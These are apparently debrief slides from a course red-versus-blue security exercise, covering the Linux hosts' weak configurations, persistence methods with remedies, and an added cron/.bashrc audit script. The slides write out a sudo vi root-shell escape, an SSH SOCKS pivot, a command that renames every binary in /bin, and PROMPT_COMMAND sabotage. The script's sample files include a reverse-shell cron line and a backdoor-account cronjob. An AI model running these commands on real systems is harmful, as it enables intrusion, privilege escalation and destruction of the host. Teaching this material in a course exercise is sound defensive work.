Spring 2025
CSE 613

Blue Team Exercise Debriefing

TOC

1. Vulnerabilities (and Patches)

2. Persistence

3. Kicking


  • Easier for us to stay in than get in
  • Hope you had a nice Easter Weekend!

Vulnerabilities

Router Configuration:

  • Bad config
    • 10222 -> ssh straight to webserver
    • 21 -> ftp vulnerabilities to metasploitable box
  • Default vyos and root
  • SSH enabled
    • Password authentication allowed
    • Allowed path to metasploitable box (unused)

Webserver Configuration

  • Default passwords:
    • root, netsec, sysfs
  • Cronjob on root
    • creates backdoor sysfs account at 3am
  • SSH enabled
    • Password authentication enabled

Zencart

  • Generally safe but a few caveats
  • phpmyadmin is enabled
    • allows login w/ root user:password
    • gives access to tables (renaming, dropping)

Persistence

Reverse Shells

  • reaches out to our machine to establish connection
  • cronjobs
  • .bashrc
  • Remedy:
    • find the running shell through ps aux and the cron entries in crontab -l / /etc/cron*
    • trickier: .bashrc can redefine commands (aliases, functions) or add extra ones -> need to inspect the file itself

Web Shell

  • malicious .php file that gives us command execution on the webserver
    • just need to delete the files

User Accounts

  • Added ssh keys to root/vyos/netsec accounts
  • Re-changed passwords if you had changed them.

SSH Portforwarding

  • given access to router, can forward traffic to webserver/internal, e.g.:
    ssh -D 9050 user@router
    proxychains ssh user@webserver
  • need to disable ssh on both machines

Privilege Escalation

  • lots of users can run sudo -i
    • remove them from the sudo user group
  • https://gtfobins.github.io/
    • e.g. sudo vi -c ':!/bin/sh' /dev/null
    • sudo -l lists what the current user may run
  • /bin/* command privileges
    • setuid bit set (rwsrwxrwx) -> the binary runs as its owner, root

Kicking

Simple Stuff

  • defacing index.php
    • cronjob
    • manual
  • vyos config changes
  • renaming mysql tables through phpmyadmin

Mean Stuff

  • DOS attacks
  • rename 's/^/pwned_/' /bin/*
    • or other commands, like cat -> nyancat or an ascii cat
    • rename 's/pwned_//' /bin/*
  • .bashrc replacements
    • PROMPT_COMMAND runs its contents before every prompt, i.e. after each command you enter
    • normally used for things like the user@machine:directory prompt, but can clear the screen and more.
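A small audit helper to go with the Remedy bullets on the Reverse Shells slide and the PROMPT_COMMAND bullet above (an added example, not from the slides): it scans a crontab or rc file for the patterns those slides name. The indicator regex, the paths and the sample files are assumptions constructed for the demo.

```shell
#!/bin/sh
# Added audit helper for this debrief; it is not from the CSE 613 slides.
# It flags the persistence patterns the slides name (cron reverse shells,
# the 3am backdoor-account cronjob, PROMPT_COMMAND overrides in .bashrc)
# in a crontab or rc file. The sample files below are constructed.

# Indicator regex (ERE). Tune for your hosts; it is a starting point only.
SUSPECT_RE='/dev/tcp/|nc(at)? .*-e|bash -i|PROMPT_COMMAND=|useradd|adduser'

# count_hits FILE: print the number of suspicious lines (0 if none).
count_hits() {
    grep -cE "$SUSPECT_RE" "$1" 2>/dev/null || true
}

# scan_file FILE: print each suspicious line as FILE:LINENO:text and
# return 1 when anything was found, so callers can branch on it.
scan_file() {
    hits=$(grep -nE "$SUSPECT_RE" "$1" 2>/dev/null | sed "s|^|$1:|")
    [ -z "$hits" ] && return 0
    printf '%s\n' "$hits"
    return 1
}

# Constructed samples standing in for /etc/crontab and ~/.bashrc.
demo=$(mktemp -d)
cat > "$demo/crontab" <<'EOF'
# constructed sample: root crontab after the exercise
0 3 * * * useradd -m sysfs
*/5 * * * * bash -i >& /dev/tcp/192.0.2.10/4444 0>&1
EOF
cat > "$demo/bashrc" <<'EOF'
# constructed sample: prompt hijack from the Mean Stuff slide
PS1='\u@\h:\w\$ '
PROMPT_COMMAND='clear'
EOF
cat > "$demo/clean_bashrc" <<'EOF'
# constructed sample: untouched rc file
PS1='\u@\h:\w\$ '
EOF

# On a real host, pass /etc/crontab, /var/spool/cron/crontabs/* and every
# user's .bashrc (root's too) instead of the samples.
for f in "$demo/crontab" "$demo/bashrc" "$demo/clean_bashrc"; do
    if scan_file "$f"; then echo "clean: $f"; fi
done
```

Anything it prints still needs a human look: a legitimate cron line may call useradd, and the regex will miss an encoded or split-up callback.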

do you want to make people miserable?

  • Happens every year! Ask Lauf to volunteer!
  • Cyber Defense in ACM Discord
  • Luke is happy to answer any questions on his methods (ludicro @ Discord)
    • hit teams 1/2/3
  • I’m also free (sclstice @ Discord)
    • hit teams 5/6/7